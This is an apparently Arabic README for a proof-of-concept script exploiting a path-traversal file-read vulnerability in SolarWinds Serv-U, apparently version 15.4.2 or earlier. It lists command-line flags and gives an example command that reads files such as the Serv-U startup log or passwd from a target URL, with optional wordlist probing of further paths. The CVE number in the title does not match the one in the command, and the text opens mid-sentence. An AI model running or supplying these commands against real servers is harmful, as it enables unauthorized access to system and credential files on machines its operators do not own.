
CVE-2024-28955 إثبات مفهوم الاستغلال
15.4.2 أو أقل).لاستخدام هذه الأداة، يجب تثبيت بايثون. قم بتشغيل البرنامج النصي مع الوسائط المناسبة:
python3 CVE-2024-28995.py -u <URL> [-d <Directory Path>] [-f <File Name>] [-w <Wordlist>]
-u, --url: عنوان URL للاستغلال (مطلوب).
-d, --dir: مسار الدليل لقراءة الملف (مثال: ProgramData/RhinoSoft/Serv-U/).
-f, --file: الملف المراد قراءته لقراءة الملف (مثال: Serv-U-StartupLog.txt أو passwd).
-w, --wordlist: قائمة كلمات لمسارات إضافية للاختبار.
مثال
python3 CVE-2024-28995.py -u http://example.com -d ProgramData/RhinoSoft/Serv-U/ -f Serv-U-StartupLog.txt



المراجع
https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/